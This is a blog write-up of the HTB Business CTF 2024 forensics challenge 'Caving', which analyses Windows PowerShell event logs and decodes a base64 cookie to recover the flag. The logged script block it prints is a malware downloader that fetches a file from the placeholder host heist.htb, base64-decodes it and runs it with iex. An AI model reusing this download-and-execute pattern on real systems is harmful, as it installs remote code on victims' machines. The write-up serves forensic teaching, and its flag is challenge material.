← Back to blog

Caving

May 18, 2024 · Hack The Box / Business CTF 2024 forensicsevtxpowershellbase64malware-analysis

Challenge

  • CTF: HTB Business CTF 2024: The Vault of Hope
  • Name: Caving
  • Category: Forensics
  • Difficulty: Very Easy
  • Points: 300
  • Description: In the shadow of the apocalypse, your team discovers an operational workstation hidden within an abandoned outpost. It holds event logs from the days leading up to the nuclear catastrophe, containing encrypted clues about the origins of the disaster. Rumors suggest that a malicious domain, heist.htb, played a crucial role in the catastrophic events. Analyze the logs to uncover connections and decode the sequence that triggered the fallout. Try to understand the full scope of the disaster and secure the knowledge needed to prevent future calamities as you journey towards the vault.
  • Objective: Event Logs Analysis

Writeup

Windows Event Viewer logs:

Install:

sudo apt install python3-evtx

Convert with python3-evtx:

find . -type f -name '*.evtx' -exec sh -c 'evtx_dump.py "$0" > "$(basename "$0" .evtx).xml"' {} \;

One log with the malicious domain heist.htb:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>5</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2024-05-17 15:54:59.643539"></TimeCreated>
<EventRecordID>205</EventRecordID>
<Correlation ActivityID="{1826c665-a872-0003-c6cf-261872a8da01}" RelatedActivityID=""></Correlation>
<Execution ProcessID="4528" ThreadID="5976"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>dev</Computer>
<Security UserID="S-1-5-21-1908633781-2821059833-3101847471-1000"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">$Radiation='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0'
$Fallout='User-Agent'
$Nuke='Cookie'
$Contamination='http://heist.htb/Exposure/plan.jpg'
$Meltdown='&gt;'
$Reactor='iex'
$Evacuation='Databasesprogs';
Set-Content -Path C:\Outyelps.txt -Value $Evacuation;
if (test-path C:\Outyelps.txt){exit};
$Isotopes='echo %appdata%\Stednavnsforskningen.Rad &amp;&amp; echo $'
$global:Re=(cmd /c $Isotopes)
$global:Geiger=$Contamination.split($Meltdown)
$Contamination=$Geiger[0];
$global:Exposure=New-Object System.Net.WebClient
$Exposure.Headers[$Fallout]=$Radiation
$Exposure.Headers[$Nuke]='f=SFRCezFudHJ1UzEwbl9kM3QzY3QzZF8hISF9'
$Controversial='Exposure.DownloadFile($Contamination,$Decontamination)'
$Controversial=$Re[1]+$Controversial;
$Decontamination=$Re[0];
$global:Civilisationer=(Test-Path $Decontamination)
while (!$Civilisationer) {
$global:Dekuperingens=$true
iex $Controversial
Start-Sleep 4
$global:Civilisationer=(Test-Path $Decontamination)
$global:Surveillance=$global:Tyvestykspakkers++%$Geiger.count
$Contamination=$Geiger[$Surveillance];}
$global:Escape = Get-Content $Decontamination
$global:Conspirators = [System.Convert]::FromBase64String($Escape)
$global:Lockpick = [System.Text.Encoding]::ASCII.GetString($Conspirators)
$global:kittels=$Lockpick.substring(337248,30277)
iex $kittels;

</Data>
<Data Name="ScriptBlockId">c761ae44-d208-4409-9730-b0039976713b</Data>
<Data Name="Path">C:\Users\developer\Desktop\h.ps1</Data>
</EventData>
</Event>

Convert SFRCezFudHJ1UzEwbl9kM3QzY3QzZF8hISF9 from base64:

echo -n 'SFRCezFudHJ1UzEwbl9kM3QzY3QzZF8hISF9' | base64 -d
HTB{1ntruS10n_d3t3ct3d_!!!}

Flag: HTB{1ntruS10n_d3t3ct3d_!!!}